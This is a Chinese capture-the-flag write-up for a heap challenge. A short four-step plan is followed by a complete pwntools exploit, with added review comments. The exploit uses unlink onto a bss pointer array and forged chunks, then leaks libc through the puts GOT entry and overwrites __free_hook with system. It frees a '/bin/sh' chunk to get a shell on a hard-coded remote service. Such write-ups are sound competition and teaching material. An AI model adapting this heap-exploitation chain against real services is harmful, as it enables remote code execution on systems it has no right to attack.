
[原创] 第二题:沉睡的敦煌

2019-6-22 22:13 416


1 unlink指向bss数组
2 edit在bss数组上面伪造堆
3 free 掉 bss 数组上伪造的堆块,在两个关键变量上写入一个 libc 地址,实现任意 edit 和 show
4 tcache 攻击改写 __free_hook,写入 system 地址

from pwn import *
# Verbose pwntools logging so every send/recv is printed while the script runs.
context.update(log_level='debug')
# Local copy of the challenge binary; the script later reads elf.got["puts"] from it.
elf=ELF("./pwn")
# Connection to the challenge service used by the writeup.
cn=remote("152.136.18.34",10001)
#cn=process("./pwn",shell=False)  # local alternative, kept commented out as in the original

def create(id,data):
    """Menu option 1: allocate slot *id* and fill it with *data*.

    The service prints a heap pointer after ``gift: `` before asking for the
    content; that value is parsed as hex and returned so the caller can use
    it as a heap leak. *data* is sent raw (no trailing newline).
    """
    cn.sendlineafter("4.show","1")
    cn.sendlineafter("index:","{}".format(id))
    # Consume the "gift: <hex>\n" line that precedes the content prompt.
    cn.recvuntil("gift: ")
    gift_line = cn.recvline()
    leaked = int(gift_line.rstrip("\n"), 16)
    cn.sendafter("ontent:",data)
    return leaked

def delete(id):
    """Menu option 2: free slot *id* on the remote service."""
    idx = "{}".format(id)
    cn.sendlineafter("4.show", "2")
    cn.sendlineafter("index:", idx)

def edit(id,data):
    """Menu option 3: overwrite slot *id* with *data* (sent raw, no newline)."""
    idx = "{}".format(id)
    cn.sendlineafter("4.show", "3")
    cn.sendlineafter("index:", idx)
    cn.sendafter("ntent:", data)

def show(id):
    """Menu option 4: ask the service to print slot *id*.

    Nothing is read here; the caller consumes the output from ``cn``.
    """
    idx = "{}".format(id)
    cn.sendlineafter("4.show", "4")
    cn.sendlineafter("index:", idx)



# --- Exploit body; the numbered steps refer to the author's 4-step plan at the top of the post ---
# NOTE(review): the script concatenates str with the bytes returned by p64()
# ("A"*0x20+p64(0x50)+"\xb0", ljust(8,"\x00")). That only works on Python 2
# pwntools; under Python 3 the str+bytes concatenation raises TypeError.
heap_addr=create(0,"a")   # slot 0; its "gift" value is the heap reference used for `offset` below
cnt=1
# Seven identical rounds of create/create/delete/re-create/delete. The
# re-created slot is filled with 0x28 filler bytes plus one 0xb0 byte (0x29
# bytes in total). Seven rounds presumably relates to the tcache attack named
# in step 4 (tcache bins hold 7 entries) — TODO confirm against the binary.
for i in range(7):
    success(hex(cnt))
    create(cnt,"a")
    cnt=cnt+1
    create(cnt, "a")
    delete(cnt-2)
    create(cnt-2,"A"*0x28+"\xb0")
    delete(cnt-1)
    cnt=cnt+1

# Address of the bss pointer array (steps 1-2). Slot i appears to live at
# array_base + 8*i, judging from target_addr and the create(31, ...) below — confirm.
array_base=0x404080
target_addr=array_base+0x8*31

# Step 1/2: slot 31 receives a fake chunk header (sizes 0x30 / 0x51) whose
# fd/bk fields point at target_addr-0x18 / target_addr-0x10, the unlink layout.
create(31,p64(0x30)+p64(0x51)+p64(target_addr-0x18)+p64(target_addr-0x10))
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
test=create(cnt,"a")   # `test` is only used by the commented-out success() below
record=cnt             # remembered so this slot can be freed after the setup
delete(cnt-1)
# 0x20 filler + a 0x50 size field + one 0xb0 byte: 0x29 bytes, same shape as the loop above.
create(cnt-1,"A"*0x20+p64(0x50)+"\xb0")
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
# Two slots laid out as pairs of (value, 0x31 size) fields.
create(cnt,p64(0xb0)+p64(0x31)+p64(0xb0)+p64(0x31))
cnt=cnt+1
create(cnt,p64(0)+p64(0x31)+p64(0)+p64(0x31))
delete(record)

#delete(31)

success(hex(cnt))
#success(hex(test))
success(hex(heap_addr))
delete(0)
# Heap-layout-dependent constant: distance from the leaked heap address (plus
# 0x5e0-0x2a0) to 0x404170. The 0x5e0/0x2a0 terms are specific to this run's
# allocation sequence — confirm if the sequence above changes.
offset=heap_addr+0x5e0-0x2a0-0x404170
# Step 3: overwrite slot 31 with two pointers to 0x404180, the array base, and offset+1.
edit(31,p64(0x404180)*2+p64(array_base)+p64(offset+1))
create(3,"aa")
create(5,"aa")
create(7,"aa")
# Slot 0 is rebuilt as another fake chunk whose fd/bk point at array_base-0x18 / -0x10.
aaa=create(0,p64(0)+p64(0x31)+p64(array_base-0x18)+p64(array_base-0x10)+p64(0))
bbb=create(1,p64(0x31)+p64(0x31))
create(9,"aaaa")


delete(29)

success(hex(heap_addr))
success(hex(aaa))
success(hex(bbb))
# Step 3 payoff: after edit(30, ...) a show(0) prints what slot 30 points at,
# so slot 30 presumably holds the pointer slot 0 is read/written through — confirm.
edit(30,p64(elf.got["puts"]))
show(0)
cn.recv()                                    # discard the menu/echo text before the leaked pointer
puts_addr=u64(cn.recv(6).ljust(8,"\x00"))    # 6-byte little-endian pointer, zero-padded to 8
# NOTE(review): these three offsets (puts, __free_hook, system) are hard-coded
# for one specific libc build; with a different libc the write below lands at
# the wrong address.
libc_base=puts_addr-0x0809c0
free_hook=libc_base+0x3ed8e8
sys_addr=libc_base+0x04f440
success(hex(libc_base))
success(hex(puts_addr))
success(hex(free_hook))
# Step 4: point slot 30 at __free_hook, write system's address there via slot 0,
# then free a slot containing "/bin/sh".
edit(30,p64(free_hook))
edit(0,p64(sys_addr))
edit(3,"/bin/sh")
delete(3)
cn.interactive()


